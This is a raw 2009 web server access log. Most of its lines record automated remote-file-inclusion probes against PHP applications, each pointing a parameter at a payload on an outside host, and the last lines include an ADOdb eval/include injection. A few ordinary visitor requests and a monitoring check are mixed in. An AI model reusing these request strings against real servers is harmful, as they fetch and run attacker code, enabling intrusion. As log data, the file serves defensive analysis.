75.126.132.20 - - [06/Oct/2009:03:30:25 -0400] "GET /logs/error_log.Q109071100%20%20//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:30:25 -0400] "GET /logs/error_log.Q109051100/include/new-visitor.inc.php?lvc_include_dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:30:25 -0400] "GET //common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:30:25 -0400] "GET /logs/error_log.Q109071100%20%20//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:30:25 -0400] "GET /logs//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:30:30 -0400] "GET /logs/error_log.Q109092400%20%20//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:30:32 -0400] "GET /logs/error_log.Q109092400%20%20//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:03:30:42 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:30:42 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:30:42 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:30:42 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:30:42 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:30:43 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
69.20.67.111 - - [06/Oct/2009:03:30:45 -0400] "GET /logs/access_log.Q109072900%20%20/e404.php?DOCUMENT_ROOT=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
62.202.120.133 - - [06/Oct/2009:03:30:47 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:30:48 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:30:48 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.4.113.98 - - [06/Oct/2009:03:30:50 -0400] "GET /logs/access_log.Q109080200//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
69.20.67.111 - - [06/Oct/2009:03:30:50 -0400] "GET /logs/access_log.Q109090900%20%20/e404.php?DOCUMENT_ROOT=http://h1.ripway.com/ilos/id1.txt???? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:03:30:50 -0400] "GET //components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 242 "-" "libwww-perl/5.805"
62.202.120.133 - - [06/Oct/2009:03:30:50 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:30:50 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
193.4.113.98 - - [06/Oct/2009:03:30:50 -0400] "GET /logs//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
75.126.132.20 - - [06/Oct/2009:03:31:01 -0400] "GET //common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:01 -0400] "GET /logs//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:01 -0400] "GET /logs/access_log.Q109071100//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:03 -0400] "GET //common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:03 -0400] "GET /logs//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:03 -0400] "GET /logs/error_log.Q109071100//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:06 -0400] "GET /logs/error_log.Q109092400//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
75.126.132.20 - - [06/Oct/2009:03:31:07 -0400] "GET /logs/error_log.Q109092400//common/db.php?commonpath=http://loss.fileave.com/pir1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:31:25 -0400] "GET /inc/pipe.php?HCL_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 210 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:31:28 -0400] "GET /logs/inc/pipe.php?HCL_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:31:28 -0400] "GET /logs/access_log.Q109072900%20%20/inc/pipe.php?HCL_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:03:31:36 -0400] "GET /logs//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:03:31:36 -0400] "GET /logs/access_log.Q109081500%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:03:31:36 -0400] "GET //technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
69.175.35.138 - - [06/Oct/2009:03:31:36 -0400] "GET /logs/access_log.Q109092200%20%20//technote7/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.learncarego.org/language/english/copyright.txt???? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:31:44 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:31:44 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
77.242.37.212 - - [06/Oct/2009:03:31:47 -0400] "GET /logs/error_log.Q109072900%20%20/inc/pipe.php?HCL_path=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:31:48 -0400] "GET /logs/error_log.Q109051100/include/new-visitor.inc.php?lvc_include_dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
62.202.120.133 - - [06/Oct/2009:03:31:54 -0400] "GET /images/head_btn-brochures.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
91.121.75.81 - - [06/Oct/2009:03:31:57 -0400] "GET /logs/access_log.Q109091900%20%20//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 263 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:31:59 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:31:59 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
62.202.120.133 - - [06/Oct/2009:03:32:10 -0400] "GET /images/head_btn-seminars.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:10 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:10 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:10 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:13 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L3103A94B74287400A9B805D+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:13 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
91.121.75.81 - - [06/Oct/2009:03:32:13 -0400] "GET /logs/access_log.Q109091900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
62.202.120.133 - - [06/Oct/2009:03:32:13 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:14 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
62.202.120.133 - - [06/Oct/2009:03:32:14 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
91.121.75.81 - - [06/Oct/2009:03:32:23 -0400] "GET //phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:32:23 -0400] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
91.121.75.81 - - [06/Oct/2009:03:32:32 -0400] "GET /logs/access_log.Q109091900//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.hit168.net//yunwangodr/id1.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:32:52 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:32:57 -0400] "GET /logs/access_log.Q109053100////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
62.202.120.133 - - [06/Oct/2009:03:32:58 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; GTB6; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; InfoPath.2; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
222.236.47.23 - - [06/Oct/2009:03:32:57 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 200 20721 "-" "Mozilla/5.0"
222.236.47.23 - - [06/Oct/2009:03:33:01 -0400] "GET /logs/access_log.Q109052800////?_SERVER[DOCUMENT_ROOT]=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
209.59.12.99 - - [06/Oct/2009:03:33:14 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.135.134.235 - - [06/Oct/2009:03:33:42 -0400] "GET /logs/access_log.Q109062100%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:03:33:43 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
61.135.134.235 - - [06/Oct/2009:03:33:43 -0400] "GET /logs//doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 243 "-" "Mozilla/5.0"
193.4.113.98 - - [06/Oct/2009:03:33:43 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
193.4.113.98 - - [06/Oct/2009:03:33:43 -0400] "GET /logs/access_log.Q109062000//components/com_simpleboard/image_upload.php?sbp=http://nlc.or.kr//zboard/data2/2030/idd.txt?? HTTP/1.1" 404 269 "-" "libwww-perl/5.805"
61.135.134.235 - - [06/Oct/2009:03:33:44 -0400] "GET //doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:33:55 -0400] "GET /logs/access_log.Q109081700/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:33:55 -0400] "GET /setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:33:55 -0400] "GET /logs/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:02 -0400] "GET /setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:02 -0400] "GET /logs/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:02 -0400] "GET /logs/access_log.Q109081700%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:04 -0400] "GET /setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:04 -0400] "GET /logs/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:04 -0400] "GET /logs/access_log.Q109081700/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:07 -0400] "GET /logs/access_log.Q109081700%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
98.164.198.14 - - [06/Oct/2009:03:34:08 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
98.164.198.14 - - [06/Oct/2009:03:34:08 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
98.164.198.14 - - [06/Oct/2009:03:34:08 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
98.164.198.14 - - [06/Oct/2009:03:34:08 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 1.1.4322; .NET CLR 2.0.50727; yie8)"
69.162.74.91 - - [06/Oct/2009:03:34:11 -0400] "GET /logs/access_log.Q109081700%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:16 -0400] "GET /logs/error_log.Q109051200%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:23 -0400] "GET /logs/error_log.Q109051200%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:23 -0400] "GET /logs/error_log.Q109051200%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.135.134.235 - - [06/Oct/2009:03:34:24 -0400] "GET /logs/access_log.Q109051600%20%20//doceboCms/class/class.dashboard_cms.php?where_framework=http://bizadmin.hongik.ac.kr/bbs/data/__zbSessionTMP/fx29id1.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:34:39 -0400] "GET /logs//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 218 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:34:39 -0400] "GET //secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:34:39 -0400] "GET /logs/access_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:34:40 -0400] "GET /logs/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:34:40 -0400] "GET /setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:34:40 -0400] "GET /logs/access_log.Q109081700%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:48 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:48 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:48 -0400] "GET /logs/access_log.Q109080800%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:49 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:51 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:51 -0400] "GET /logs/access_log.Q109080800%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:51 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
64.27.9.117 - - [06/Oct/2009:03:34:53 -0400] "GET /logs/error_log.Q109051200%20%20/setup.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:55 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:59 -0400] "GET //include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:59 -0400] "GET /logs//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 221 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:34:59 -0400] "GET /logs/access_log.Q109080800%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
69.162.74.91 - - [06/Oct/2009:03:35:00 -0400] "GET /logs/access_log.Q109072200%20%20//include/write.php?dir=http://www.exprimerie.fr//components/com_virtuemart/zfxid1.txt? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:10 -0400] "GET /logs/error_log.Q109060500%20%20//secpay.inc.php?config[root_dir]=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:11 -0400] "GET /logs//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:11 -0400] "GET /logs/access_log.Q109080400%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
61.135.134.109 - - [06/Oct/2009:03:35:11 -0400] "GET /logs/access_log.Q109092000%20%20//adodb-perf-module.inc.php?last_module=zZz_ADOConnection%7B%7Deval($_GET[w]);class%20zZz_ADOConnection%7B%7D//&w=include($_GET[a]);&a=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
